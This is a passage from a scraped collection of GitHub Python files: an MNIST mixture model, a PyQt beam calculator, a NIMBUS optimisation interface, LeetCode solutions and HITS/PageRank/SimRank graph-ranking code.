\"\"\" \n\t\t\n if M is None:\n M = np.ones(X.shape, dtype=int)\n\n # Using X_modified and One_minus_X_modified,\n # we ensure that values for which X isn't observed, don't change the probabilities\n \n X_modified = np.zeros(np.shape(X))\n X_modified[np.where(M==1)] = X[np.where(M==1)]\n One_minus_X_modified = np.zeros(np.shape(X))\n One_minus_X_modified[np.where(M==1)] = (1 - X)[np.where(M==1)]\n \n log_p_x_given_z = np.dot(X_modified, np.log(self.params.theta).T) + \\\n np.dot(One_minus_X_modified, np.log(1. - self.params.theta).T)\n \n \n log_p_z_x = log_p_x_given_z + np.log(self.params.pi) \n \n # subtract the max of each row to avoid numerical instability\n log_p_z_x_shifted = log_p_z_x - log_p_z_x.max(1).reshape((-1, 1))\n\n # convert the log probabilities to probabilities and renormalize\n R = np.exp(log_p_z_x_shifted)\n R /= R.sum(1).reshape((-1, 1))\n return R\n\n def posterior_predictive_means(self, X, M):\n \"\"\"Compute the matrix of posterior predictive means for unobserved pixels given the observed\n pixels. The matrix M is a binary matrix the same size as X which determines which pixels\n are observed. (1 means observed, and 0 means unobserved.) You should return a real-valued\n matrix the same size as X. For all the entries corresponding to unobserved pixels, the value\n should determine the posterior probability that the pixel is on, conditioned on the observed\n pixels. It does not matter what values you assign for observed pixels, since those values\n aren't used for anything. Hint: the solution involves two very short lines, one of which is\n a call to self.compute_posterior.\"\"\"\n\n R = self.compute_posterior(X, M)\n X_returned = np.dot(R, self.params.theta)\n \n return X_returned\n\n \n def visualize_components(self, title=None):\n \"\"\"Visualize the learned components. Each of the images shows the Bernoulli parameters\n (probability of the pixel being 1) for one of the mixture components.\"\"\"\n\n pylab.figure('Mixture components')\n pylab.matshow(util.arrange(self.params.theta.reshape((-1, IMAGE_DIM, IMAGE_DIM))),\n fignum=False, cmap='gray')\n if title is None:\n title = 'Mixture components'\n pylab.title(title)\n pylab.draw()\n\n def visualize_predictions(self, X, M, title=None):\n \"\"\"Visualize the predicted probabilities for each of the missing pixels.\"\"\"\n\n P = self.posterior_predictive_means(X, M)\n imgs = np.where(M, X, P)\n obs = np.where(M, X, 0.3)\n\n pylab.figure('Observations')\n pylab.matshow(util.arrange(obs.reshape((-1, IMAGE_DIM, IMAGE_DIM))),\n fignum=False, cmap='gray')\n pylab.title('Observations')\n\n pylab.figure('Model predictions')\n pylab.matshow(util.arrange(imgs.reshape((-1, IMAGE_DIM, IMAGE_DIM))),\n fignum=False, cmap='gray')\n if title is None:\n title = 'Model predictions'\n pylab.title(title)\n pylab.draw()\n \n\ndef train_from_labels(prior=None, show=True):\n \"\"\"Fit the mixture model using the labeled MNIST data. 
There are 10 mixture components,\n one corresponding to each of the digit classes.\"\"\"\n \n X = util.read_mnist_images(TRAIN_IMAGES_FILE)\n y = util.read_mnist_labels(TRAIN_LABELS_FILE)\n X_test = util.read_mnist_images(TEST_IMAGES_FILE)\n num_data, num_pixels = X.shape\n\n if prior is None:\n prior = Prior.default_prior()\n model = Model.random_initialization(prior, 10, IMAGE_DIM**2)\n\n R = np.zeros((num_data, 10))\n R[np.arange(num_data), y] = 1.\n model.params.pi = model.update_pi(R)\n model.params.theta = model.update_theta(X, R)\n\n # mask which includes top half of pixels\n M = np.zeros(X.shape, dtype=int)\n M[:, :M.shape[1]//2] = 1\n\n if show:\n model.visualize_components()\n try:\n model.visualize_predictions(X[:64, :], M[:64, :])\n except:\n print('Posterior predictive distribution not implemented yet.')\n\n print('Training log-likelihood:', model.log_likelihood(X) / num_data)\n print('Test log-likelihood:', model.log_likelihood(X_test) / X_test.shape[0])\n\n return model\n \n \ndef train_with_em(num_components=100, num_steps=50, prior=None, draw_every=1):\n \"\"\"Fit the mixture model in an unsupervised fashion using E-M.\"\"\"\n \n X = util.read_mnist_images(TRAIN_IMAGES_FILE)\n X_test = util.read_mnist_images(TEST_IMAGES_FILE)\n num_data, num_pixels = X.shape\n\n if prior is None:\n prior = Prior.default_prior()\n model = Model.random_initialization(prior, num_components, num_pixels)\n\n # mask which includes top half of pixels\n M = np.zeros(X.shape, dtype=int)\n M[:, :M.shape[1]//2] = 1\n\n loglik_vals = []\n\n for i in range(num_steps):\n # E-step\n R = model.compute_posterior(X)\n\n # M-step\n model.params.pi = model.update_pi(R)\n model.params.theta = model.update_theta(X, R)\n\n loglik = model.log_likelihood(X) / num_data\n loglik_vals.append(loglik)\n\n if (i+1) % draw_every == 0:\n model.visualize_components()\n model.visualize_predictions(X[:64, :], M[:64, :])\n\n pylab.figure('Log-likelihood')\n pylab.clf()\n pylab.semilogx(np.arange(1, i+2), loglik_vals)\n pylab.title('Log-likelihood')\n pylab.xlabel('Number of E-M steps')\n pylab.draw()\n\n\n print('Final training log-likelihood:', model.log_likelihood(X) / num_data)\n print('Final test log-likelihood:', model.log_likelihood(X_test) / X_test.shape[0])\n\n return model\n\n\t\nif __name__ == '__main__':\n #train_from_labels()\n train_with_em()","repo_name":"019manpreet/image-completion","sub_path":"image-completion.py","file_name":"image-completion.py","file_ext":"py","file_size_in_byte":11979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71415869492","text":"import traceback\nimport os\nfrom PyQt5 import QtWidgets, uic, Qt\n\nfrom beamCalculator.Ui.Add_UDL_dialog_window import Add_UDL_dialog_window\nfrom beamCalculator.Ui.Add_beam_dialog_window import Add_beam_dialog_window\nfrom beamCalculator.Ui.Add_moment_dialog_window import Add_moment_dialog_window\nfrom beamCalculator.Ui.Add_support_dialog_window import Add_support_dialog_window\nfrom beamCalculator.Ui.Add_pointLoad_dialog_window import Add_pointLoad_dialog_window\nfrom beamCalculator.Ui.Rectangular_cross_section_dialog_window import Rectangular_cross_section_dialog_window\nfrom beamCalculator.Ui.Reset_dialog_window import Reset_dialog_window\nfrom beamCalculator.Ui.Show_dialog_error_messgae_box import showDialogErrorMessageBox\nfrom beamCalculator.Ui.Solution_summary_dialog_window import Solution_summary_dialog_window\nfrom beamCalculator.Ui.Square_cross_section_dialog_window import 
Square_cross_section_dialog_window\nfrom beamCalculator.Calculator.Material.SteelAISI1045 import SteelAISI1045\nfrom beamCalculator.Calculator.Material.CastIronGrade20 import CastIronGrade20\nfrom beamCalculator.Calculator.Beam.Beam import Beam\n\nfrom beamCalculator.definitions import UI_FILES_DIR\n\n\nclass Window(QtWidgets.QMainWindow):\n def __init__(self):\n super(Window, self).__init__()\n uic.loadUi(os.path.join(UI_FILES_DIR, 'beam_calculator_main_window.ui'), self)\n\n self.crossSectionComboBoxDialogWindowMappings = {0: None,\n 1: self.open_square_cross_section_dialog_window,\n 2: self.open_rectangular_cross_section_dialog_window}\n self.materialMappings = {0: None, 1: SteelAISI1045, 2: CastIronGrade20}\n\n # Properties of the users beam used for calculation\n self.user_beam_length = None\n self.user_beam_cross_section = None\n self.user_beam_loads = []\n self.user_beam_supports = []\n\n # Users beam object\n self.user_beam = None\n\n # Define click event actions for buttons\n self.addBeamButton.clicked.connect(self.open_add_beam_window)\n self.addSupportButton.clicked.connect(self.open_add_support_window)\n self.addPointLoadButton.clicked.connect(self.open_add_pointLoad_window)\n self.addMomentButton.clicked.connect(self.open_add_moment_window)\n self.addUDLButton.clicked.connect(self.open_add_udl_window)\n self.crossSectionSelectionComboBox.currentIndexChanged.connect(self.open_cross_section_dialog_window)\n self.solveButton.clicked.connect(self.solve)\n self.resetButton.clicked.connect(self.open_reset_dialog_window)\n\n def clear_user_beam_length(self):\n self.user_beam_length = None\n\n def clear_user_beam_cross_section(self):\n self.user_beam_cross_section = None\n self.crossSectionSelectionComboBox.setCurrentIndex(0)\n\n def clear_user_beam_point_loads(self):\n self.user_beam_loads = [l for l in self.user_beam_loads if l[0] != 'point']\n\n def clear_user_beam_moments(self):\n self.user_beam_loads = [l for l in self.user_beam_loads if l[0] != 'moment']\n\n def clear_user_beam_udl(self):\n self.user_beam_loads = [l for l in self.user_beam_loads if l[0] != 'udl']\n\n def clear_user_beam_supports(self):\n self.user_beam_supports.clear()\n\n def clear_user_beam_material(self):\n self.materialSelectionComboBox.setCurrentIndex(0)\n\n def open_add_beam_window(self): # Group into one open_dialog_window function with a dialog.UiFiles parameter\n self.dialog = Add_beam_dialog_window()\n self.dialog.exec_()\n self.user_beam_length = self.dialog.inputted_beam_length\n\n def open_add_support_window(self):\n self.dialog = Add_support_dialog_window()\n self.dialog.exec_()\n if is_all_support_data_present(self.dialog):\n self.user_beam_supports.append((self.dialog.support_type, self.dialog.support_location))\n\n def open_add_pointLoad_window(self):\n self.dialog = Add_pointLoad_dialog_window()\n self.dialog.exec_()\n if is_all_point_load_dialog_data_present(self.dialog):\n self.user_beam_loads.append(\n (\"point\", self.dialog.inputted_load_magnitude, self.dialog.inputted_load_location))\n\n def open_add_moment_window(self):\n self.dialog = Add_moment_dialog_window()\n self.dialog.exec_()\n if is_all_moment_dialog_data_present(self.dialog):\n self.user_beam_loads.append(\n (\"moment\", self.dialog.inputted_load_magnitude, self.dialog.inputted_load_location))\n\n def open_add_udl_window(self):\n self.dialog = Add_UDL_dialog_window()\n self.dialog.exec_()\n if is_all_udl_dialog_window_data_present(self.dialog):\n self.user_beam_loads.append((\"udl\", self.dialog.inputted_load_magnitude,\n 
self.dialog.inputted_load_start_location,\n self.dialog.inputted_load_end_location, self.dialog.inputted_load_order))\n\n def open_cross_section_dialog_window(self):\n idx = self.crossSectionSelectionComboBox.currentIndex()\n if idx != 0:\n self.crossSectionComboBoxDialogWindowMappings[idx]()\n\n def open_rectangular_cross_section_dialog_window(self):\n self.dialog = Rectangular_cross_section_dialog_window()\n self.dialog.exec_()\n self.user_beam_cross_section = self.dialog.get_user_cross_section()\n\n def open_square_cross_section_dialog_window(self):\n self.dialog = Square_cross_section_dialog_window()\n self.dialog.exec_()\n self.user_beam_cross_section = self.dialog.get_user_cross_section()\n\n def open_solution_summary_dialog_window(self):\n self.dialog = Solution_summary_dialog_window(self.user_beam)\n self.dialog.show()\n\n def open_reset_dialog_window(self):\n self.dialog = Reset_dialog_window(self)\n self.dialog.exec_()\n\n def get_selected_material(self):\n try:\n return self.materialMappings[self.materialSelectionComboBox.currentIndex()]()\n except:\n return None\n\n def get_selected_cross_section(self):\n pass\n\n def solve(self):\n try:\n if self.is_valid_beam_input():\n self.user_beam = Beam(self.user_beam_length, self.user_beam_cross_section, self.get_selected_material())\n self.user_beam.set_supports(self.user_beam_supports)\n self.user_beam.set_loads(self.user_beam_loads)\n self.user_beam.calculate()\n self.open_solution_summary_dialog_window()\n else:\n raise InvalidBeamInputException\n except:\n traceback.print_exc()\n showDialogErrorMessageBox()\n\n def is_valid_beam_input(self):\n if None in [self.user_beam_length, self.user_beam_cross_section, self.get_selected_material()] or len(\n self.user_beam_loads) == 0 or len(self.user_beam_supports) == 0:\n return False\n return True\n\n\ndef is_all_support_data_present(dialog):\n return not None in [dialog.support_type, dialog.support_location]\n\n\ndef is_all_point_load_dialog_data_present(dialog):\n return not None in [dialog.inputted_load_location, dialog.inputted_load_magnitude]\n\n\ndef is_all_moment_dialog_data_present(dialog):\n return not None in [dialog.inputted_load_location, dialog.inputted_load_magnitude]\n\n\ndef is_all_udl_dialog_window_data_present(dialog):\n return not None in [dialog.inputted_load_magnitude, dialog.inputted_load_start_location,\n dialog.inputted_load_end_location, dialog.inputted_load_order]\n\n\nclass InvalidBeamInputException(Exception):\n pass\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = Window()\n MainWindow.show()\n sys.exit(app.exec_())\n","repo_name":"mark2661/beamCalculator","sub_path":"Ui/beam_calculator_main_window.py","file_name":"beam_calculator_main_window.py","file_ext":"py","file_size_in_byte":7914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40775205918","text":"import sys\nimport csv\nimport datetime\nimport glob\n\nclass FileManager():\n date = datetime.datetime.strftime(datetime.datetime.now(),'%m-%d-%Y %H:%M:%S')\n location = 'D:\\\\Test\\\\'\n csvfile = 'manager.csv'\n \n def __init__(self):\n f = glob.glob(self.location+'*.csv')\n if self.csvfile in f:\n self.csv_read()\n else:\n self.csv_create()\n \n \n def checkdates(self,lastdate):\n pass\n \n def csv_create(self):\n file = open('DateManager.csv','wb')\n wr = csv.writer(file, quoting=csv.QUOTE_ALL)\n wr.writerow(self.date)\n \n \n def csv_read(self):\n csv_l = list()\n with 
open(self.csvfile,'rb') as file:\n csv_reader = csv.reader(file, delimiter=',')\n for row in csv_reader:\n csv_l.append(row)\n \n def csv_append(self):\n with open(self.csvfile,'wb') as file:\n csv_writer = csv.writer(file, quoting=csv.QUOTE_ALL)\n csv_writer.writerow(self.date)\n \n \n \n \n ","repo_name":"kmj442/FileManager","sub_path":"src/FileCheck.py","file_name":"FileCheck.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10348704686","text":"import numpy as np\nimport cv2 as cv\n\ninitial_image = np.array([[255,87], \n [150,30]])\n\nprint(\"\\nIN(8 bits):\")\nprint(initial_image)\nprint('\\n')\n\nscale = pow(2,8) / pow(2,11)\noutput11 = initial_image / scale\n# print(output11)\noutput11 = np.round_(output11)\n# print(output11)\noutput11 = output11*scale + scale/2\noutput11 = np.round_(output11) \n# print(\"OUT(11 bits):\")\n# print(output11)\n# print('\\n')\n\n# scale = pow(2,11) / pow(2,8)\n# output11 = initial_image * scale\n# output11 = np.round_(output11)\n# print(\"OUT(11 bits):\")\n# print(output11)\n# print('\\n')\n\n# scale = 32 / 255\n# output5 = initial_image * scale\n# output5 = np.round_(output5)\n# print(\"OUT(5 bits):\")\n# print(output5)\n# print('\\n')\n\n# scale = 8 / 255\n# output3 = initial_image * scale\n# output3 = np.round_(output3)\n# print(\"OUT(3 bits):\")\n# print(output3)\n# print()\n\n# ","repo_name":"Rekiichan/Exercises","sub_path":"b_5_test.py","file_name":"b_5_test.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22495671554","text":"class Solution(object):\n #O(n*k) Time | O(k) Space, where k is length of longest email and n is length of emails\n def numUniqueEmails(self, emails):\n \"\"\"\n :type emails: List[str]\n :rtype: int\n \"\"\"\n uniqueEmails = set()\n for email in emails:\n finalEmail = self.getFinalEmail(email)\n uniqueEmails.add(finalEmail)\n return len(uniqueEmails)\n \n # O(k) Time | O(k) Space, where k is length of email\n def getFinalEmail(self, email):\n localName = email.split('@')[0]\n domainName = email.split('@')[1]\n local = localName.split('+')[0].replace('.', '')\n return local + '@' + domainName\n","repo_name":"ayush-algoexpert/Leetcode","sub_path":"unique-email-addresses.py","file_name":"unique-email-addresses.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42242105957","text":"import os, sys\n\nfrom matplotlib.pyplot import step\np = os.path.abspath('.')\nsys.path.insert(1, p)\n\nfrom desdeo_interface.physical_interfaces.Interface import Interface\nfrom desdeo_interface.components.Button import Button\nfrom desdeo_interface.components.Potentiometer import Potentiometer\nfrom desdeo_interface.components.Master import Master\nfrom time import sleep\nimport numpy as np\nfrom typing import Union, Optional, List, Tuple\nfrom desdeo_problem.Problem import MOProblem\n\nclass NimbusInterface(Interface):\n \"\"\"\n A interface class for the Nimbus method\n Args:\n port (str): The serial port Arduino is connected\n button_pins (Union[np.array, List[int]]): digital pins that are connected to buttons\n potentiometer_pins (Union[np.array, List[int]]): analog pins that are connected to potentiometers\n rotary_encoder_pins (Union[np.ndarray, List[List[int]]]): pairs of digital pins that are connected to rotary encoders\n 
variable_bounds (Optional[np.ndarray]): Bounds for reference points, defaults to [0,1] for each variable\n \"\"\"\n\n def __init__(\n self,\n # master: Master,\n problem: MOProblem,\n # button_pins: Union[np.array, List[int]] = [],\n # potentiometer_pins: Union[np.array, List[int]] = [],\n # rotary_encoders_pins: Union[np.ndarray, List[List[int]]] = [],\n ):\n super().__init__(problem, True)\n \n def get_levels(self):\n print(\"Set aspiration levels and/or upper bounds\")\n return np.array(self.get_values(np.stack((self.problem.ideal, self.problem.nadir)), step_size = 0.05))\n \n def get_classification(self) -> str:\n \"\"\"\n Choose a classification for an objective from [\"<\", \"<=\", \"=\", \">=\", \"0\"]\n\n Returns:\n str: Chosen classification\n \"\"\"\n classification_options = [\"<\", \"<=\", \"=\", \">=\", \"0\"]\n return self.choose_from(classification_options)[1]\n \n # Maybe this could be with value handlers aswell\n def get_classifications(self) -> List[str]:\n \"\"\"\n Choose a classification for each objective \n\n Returns:\n List[str]: Chosen classifications\n \"\"\"\n classifications = []\n objective_count = self.problem.n_of_objectives\n for obj_index in range(objective_count):\n print(f\"Pick a classification level for objective at index {obj_index}\")\n classification = self.get_classification()\n classifications.append(classification)\n print(f\"Chosen classifications: {classifications}\")\n return classifications\n \n def specify_solution_count(self):\n \"\"\"\n Specify the amount of solutions to be calculated in the next step\n\n Returns:\n int: The amount of solutions to be calculated\n \"\"\"\n print(\"Select solution count\")\n return self.choose_value(1, 5)\n \n def pick_preferred_solution(self, solutions: np.ndarray):\n \"\"\"\n Let the DM pick a preferred solution from a list of solutions\n\n Returns:\n Any: The preferred solution\n \"\"\"\n return self.choose_from(solutions)[0]\n \n def should_continue(self):\n \"\"\"\n Should the method be continued or stopped\n\n Returns:\n bool: Whether or not to continue\n \"\"\"\n return self.confirmation(\"Continue?\")\n\n def try_another_classification(self):\n \"\"\"\n Does the DM want to try another set of classifications\n\n Returns:\n bool: Whether or not to change classifications\n \"\"\"\n return self.confirmation(\"Try another classification?\")\n \n def show_different_alternatives(self):\n \"\"\"\n Does the DM want to see different alternatives\n\n Returns:\n bool: Whether or not to see different alternatives\n \"\"\"\n return self.confirmation(\"Show alternatives?\")\n \n def save_solutions(self, solutions):\n \"\"\"\n Let the DM pick solutions they want to be saved\n\n Args:\n solutions (np.ndarray): Array of selectable solutions\n\n Returns:\n List: A list of the solutions the DM wants to save\n \"\"\"\n selected_solutions = self.choose_multiple(solutions, 0) # Get the solutions\n selected_solutions = list(map(lambda s: s[0], selected_solutions)) # Only get the indices\n return selected_solutions\n\n def choose_two_solutions(self, solutions):\n \"\"\"\n Let the DM choose two solutions for the intermediate solutions step\n\n Args:\n solutions (np.ndarray): Array of selectable solutions\n\n Returns:\n List: A list with the two chosen solutions\n \"\"\"\n selected_solutions = self.choose_multiple(solutions,2,2)\n selected_solutions = list(map(lambda s: s[0], selected_solutions))\n return selected_solutions\n\n\nif __name__ == \"__main__\":\n import matplotlib.pyplot as plt\n from desdeo_problem.Problem import 
MOProblem\n from desdeo_problem.Variable import variable_builder\n from desdeo_problem.Objective import _ScalarObjective\n\n def plot(request_type: str):\n plt.scatter(p_front[:, 0], p_front[:, 1], label=\"Pareto front\")\n plt.scatter(problem.ideal[0], problem.ideal[1], label=\"Ideal\")\n plt.scatter(problem.nadir[0], problem.nadir[1], label=\"Nadir\")\n if request_type == \"preferred\":\n for i, z in enumerate(preferred_request.content[\"objectives\"]):\n plt.scatter(z[0], z[1], label=f\"solution {i}\")\n elif request_type == \"save\":\n for i, z in enumerate(save_request.content[\"objectives\"]):\n plt.scatter(z[0], z[1], label=f\"solution {i}\")\n else:\n for i, z in enumerate(intermediate_request.content[\"objectives\"]):\n plt.scatter(z[0], z[1], label=f\"solution {i}\")\n plt.xlabel(\"f1\")\n plt.ylabel(\"f2\")\n plt.title(\"Approximate Pareto front of the Kursawe function\")\n plt.legend()\n plt.show()\n \n def f_1(xs: np.ndarray):\n xs = np.atleast_2d(xs)\n xs_plusone = np.roll(xs, 1, axis=1)\n return np.sum(-10*np.exp(-0.2*np.sqrt(xs[:, :-1]**2 + xs_plusone[:, :-1]**2)), axis=1)\n\n def f_2(xs: np.ndarray):\n xs = np.atleast_2d(xs)\n return np.sum(np.abs(xs)**0.8 + 5*np.sin(xs**3), axis=1)\n\n varsl = variable_builder(\n [\"x_1\", \"x_2\", \"x_3\"],\n initial_values=[0, 0, 0],\n lower_bounds=[-5, -5, -5],\n upper_bounds=[5, 5, 5],\n )\n\n f1 = _ScalarObjective(name=\"f1\", evaluator=f_1)\n f2 = _ScalarObjective(name=\"f2\", evaluator=f_2)\n\n nadir=np.array([-14, 0.5])\n ideal=np.array([-20, -12])\n \n problem = MOProblem(variables=varsl, objectives=[f1, f2], ideal=ideal, nadir=nadir)\n\n from desdeo_tools.solver import ScalarMethod\n from scipy.optimize import differential_evolution\n from desdeo_mcdm.interactive.NIMBUS import NIMBUS\n\n scalar_method = ScalarMethod(\n lambda x, _, **y: differential_evolution(x, **y), use_scipy=True, method_args={\"polish\": True, \"disp\": True}\n )\n\n method = NIMBUS(problem, scalar_method)\n\n interface = NimbusInterface(problem)\n\n \n from desdeo_mcdm.utilities.solvers import solve_pareto_front_representation\n\n p_front = solve_pareto_front_representation(problem, step=1.0)[1]\n print(p_front)\n\n plt.scatter(p_front[:, 0], p_front[:, 1], label=\"Pareto front\")\n plt.scatter(problem.ideal[0], problem.ideal[1], label=\"Ideal\")\n plt.scatter(problem.nadir[0], problem.nadir[1], label=\"Nadir\")\n plt.xlabel(\"f1\")\n plt.ylabel(\"f2\")\n plt.title(\"Approximate Pareto front of the Kursawe function\")\n plt.legend()\n plt.show()\n\n\n\n classification_request, plot_request = method.start()\n print(classification_request.content[\"objective_values\"])\n\n print(classification_request.content[\"message\"]) # Divide objective functions\n \n classifications = interface.get_classifications()\n levels = interface.get_levels()\n solution_count = interface.specify_solution_count()\n\n response = {\n \"classifications\": classifications,\n \"number_of_solutions\": solution_count,\n \"levels\": levels\n }\n\n classification_request.response = response\n\n save_request, plot_request = method.iterate(classification_request)\n next_request = \"save\"\n while True:\n if next_request == \"save\": # Then we need to specify indices for later viewing\n print(save_request.content['message'])\n objectives = save_request.content['objectives']\n print(objectives)\n saved_solutions = interface.save_solutions(objectives) # Get desired indices from the interface\n save_request.response = {\"indices\": saved_solutions}\n intermediate_request, plot_request = 
method.iterate(save_request)\n next_request = \"intermediate\"\n\n elif next_request == \"intermediate\": # See intermediate solutions?\n print(intermediate_request.content[\"message\"])\n solutions = intermediate_request.content[\"solutions\"]\n see_intermediate_solutions = interface.show_different_alternatives()\n if see_intermediate_solutions:\n sol = interface.choose_two_solutions(solutions)\n number_of_desired_solutions = interface.specify_solution_count()\n response = {\"number_of_desired_solutions\": number_of_desired_solutions, \"indices\": sol}\n intermediate_request.response = response\n save_request, plot_request = method.iterate(intermediate_request)\n next_request = \"save\"\n else:\n response = {\"number_of_desired_solutions\": 0, \"indices\": []}\n intermediate_request.response = response\n preferred_request, plot_request = method.iterate(intermediate_request)\n next_request = \"preferred\"\n \n elif next_request == \"preferred\":\n print(preferred_request.content[\"message\"])\n solutions = preferred_request.content[\"solutions\"]\n preferred_solution = interface.pick_preferred_solution(solutions)\n should_continue = interface.should_continue()\n preferred_request.response = {\"index\": preferred_solution, \"continue\": should_continue}\n if not should_continue:\n break\n classification_request, plot_request = method.iterate(preferred_request)\n next_request = \"classification\"\n \n elif next_request == \"classification\":\n print(classification_request.content[\"message\"])\n objective_count = len(problem.objectives)\n classifications = interface.get_classifications()\n levels = interface.get_levels()\n solution_count = interface.specify_solution_count()\n response = {\n \"classifications\": classifications,\n \"number_of_solutions\": solution_count,\n \"levels\": levels\n }\n classification_request.response = response\n save_request, plot_request = method.iterate(classification_request)\n next_request = \"save\"\n\n plot(next_request)\n\n response = {\n \"classifications\": classifications,\n \"number_of_solutions\": solution_count,\n \"levels\": levels\n }\n classification_request.response = response\n\n\n stop_request, plot_request = method.iterate(preferred_request)\n\n print(f\"Final decision variables: {stop_request.content['solution']}\")\n\n plt.scatter(p_front[:, 0], p_front[:, 1], label=\"Pareto front\")\n plt.scatter(problem.ideal[0], problem.ideal[1], label=\"Ideal\")\n plt.scatter(problem.nadir[0], problem.nadir[1], label=\"Nadir\")\n plt.scatter(stop_request.content[\"objective\"][0], stop_request.content[\"objective\"][1], label=f\"final solution\")\n plt.xlabel(\"f1\")\n plt.ylabel(\"f2\")\n plt.title(\"Approximate Pareto front of the Kursawe function\")\n plt.legend()\n plt.show()","repo_name":"phoopies/DesdeoInterface","sub_path":"obsolete/physical_interfaces/NimbusInterface.py","file_name":"NimbusInterface.py","file_ext":"py","file_size_in_byte":12029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38255988638","text":"class Solution(object):\n def compareVersion(self, version1, version2):\n \"\"\"\n :type version1: str\n :type version2: str\n :rtype: int\n \"\"\"\n as_stack = lambda x:map(int, x.split('.'))\n stack1, stack2 = map(as_stack, (version1, version2))\n get_v = lambda l,idx: l[idx] if idxv2: return 1\n if v2>v1: return -1\n return 
0\n","repo_name":"dborzov/leetcode","sub_path":"165-compare-version-numbers.py","file_name":"165-compare-version-numbers.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38588728191","text":"import numpy as np\nimport random\n\n# Version of regular python enumerate with a step parameter\ndef enumerate2(xs, start=0, step=1):\n i = start\n for count in range(len(xs)):\n try:\n yield (count, xs[i])\n except:\n break\n i += step\n\n\n#########################################\n##### Augmentation kwarg generators #####\n#########################################\ndef get_rotation_kwargs(epoch, epochs_per_aug):\n scalar = float(180) / epochs_per_aug\n min_rotation = (epoch - 1) * scalar\n max_rotation = epoch * scalar\n rotation_sample = random.choice([-1, 1]) * random.uniform(min_rotation, max_rotation)\n return {'angle': rotation_sample}\n\ndef get_blur_kwargs(epoch, epochs_per_aug):\n if epoch < 3:\n epoch += 2 # Size 1 kernel does nothing, so add 2 to get size 3 kernel\n if epoch % 2 == 1:\n return {'kernel_size': epoch}\n\n # Use half the default std. dev. and keep kernel same size as last time\n sigma = (0.3 * ((epoch) * 0.5 - 1) + 0.8) / 2\n return {'kernel_size': epoch - 1, 'sigma': sigma}\n\ndef get_gamma_kwargs(epoch, epochs_per_aug):\n return {'gamma': epoch}\n\ndef get_crop_kwargs(epoch, epochs_per_aug):\n return {'output_size': 32 - 2 * epoch}\n\n","repo_name":"Andrew-Draganov/augmentation_dimensionality","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33988994971","text":"from graph import graph\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom pprint import PrettyPrinter\n\n\ndef hits(graph, min_diff=0.01):\n nodes = graph.nodes()\n auth = dict.fromkeys(nodes, 1)\n hub = dict.fromkeys(nodes, 1)\n iteration = 0\n\n while True:\n iteration += 1\n prev_auth = auth.copy()\n prev_hub = hub.copy()\n\n for node in nodes:\n auth[node] = sum(prev_hub.get(parent, 0) for parent in graph.parents(node))\n hub[node] = sum(prev_auth.get(child, 0) for child in graph.childrens(node))\n\n norm_auth = sum(auth.values())\n norm_hub = sum(hub.values())\n auth = {key: val / norm_auth for key, val in auth.items()}\n hub = {key: val / norm_hub for key, val in hub.items()}\n\n diff = sum((abs(prev_hub[k] - hub[k]) for k in hub)) + sum((abs(prev_auth[k] - auth[k]) for k in auth))\n if diff <= min_diff:\n break\n\n return auth, hub, iteration\n\n\ndef pagerank(graph, min_diff=0.0001, damping_factor=0.15):\n nodes = graph.nodes()\n pagerank = dict.fromkeys(nodes, 1.0 / len(nodes))\n iteration = 0\n\n while True:\n iteration += 1\n diff = 0\n\n for node in nodes:\n rank = (1.0 - damping_factor) / len(nodes)\n for parent in graph.parents(node):\n rank += damping_factor * pagerank[parent] / len(graph.childrens(parent))\n\n diff += abs(pagerank[node] - rank)\n pagerank[node] = rank\n\n if diff <= min_diff:\n break\n\n return pagerank, iteration\n\n\ndef simrank(graph, min_diff=0.01, decay_factor=0.8):\n nodes = graph.nodes()\n sim = np.identity(len(nodes))\n iteration = 0\n\n while True:\n iteration += 1\n prev_sim = np.copy(sim)\n\n for idx_u, u in enumerate(nodes):\n for idx_v, v in enumerate(nodes):\n if u is v:\n continue\n\n len_up = len(graph.parents(u))\n len_vp = len(graph.parents(v))\n if len_up == 0 or len_vp == 0:\n sim[idx_u][idx_v] = 0\n 
else:\n sum = 0\n for u_p in graph.parents(u):\n for v_p in graph.parents(v):\n sum += prev_sim[nodes.index(u_p)][nodes.index(v_p)]\n \n sim[idx_u][idx_v] = (decay_factor / (len_up * len_vp)) * sum\n\n if np.allclose(sim, prev_sim, atol=min_diff):\n break\n\n return sim, iteration\n\n\nif __name__ == '__main__':\n\n graphs = list()\n for i in range(1, 8):\n from graph import graph\n filename = 'hw3dataset/graph_{}.txt'.format(i)\n graph = graph()\n graph.read_from_file(filename)\n graphs.append(graph)\n\n\n for idx, graph in enumerate(graphs, 1):\n filename = './result/hits/graph_{}.txt'.format(idx)\n with open(filename, 'w+') as f:\n pp = PrettyPrinter(indent=4, stream=f)\n f.write('\\nGraph {}\\n'.format(idx))\n a, h, i = hits(graph)\n f.write('Run {} iterations \\nhub:\\n'.format(i))\n pp.pprint(h)\n f.write('auth:\\n')\n pp.pprint(a)\n print('(hits) graph_{}.txt saved'.format(idx))\n\n for idx, graph in enumerate(graphs, 1):\n filename = './result/pagerank/graph_{}.txt'.format(idx)\n with open(filename, 'w+') as f:\n pp = PrettyPrinter(indent=4, stream=f)\n f.write('\\nGraph {}\\n'.format(idx))\n pr, i = pagerank(graph)\n f.write('Run {} iterations \\nPage Rank:\\n'.format(i))\n pp.pprint(pr)\n print('(pagerank) graph_{}.txt saved'.format(idx))\n\n for idx, graph in enumerate(graphs, 1):\n if idx == 6:\n break\n\n filename = 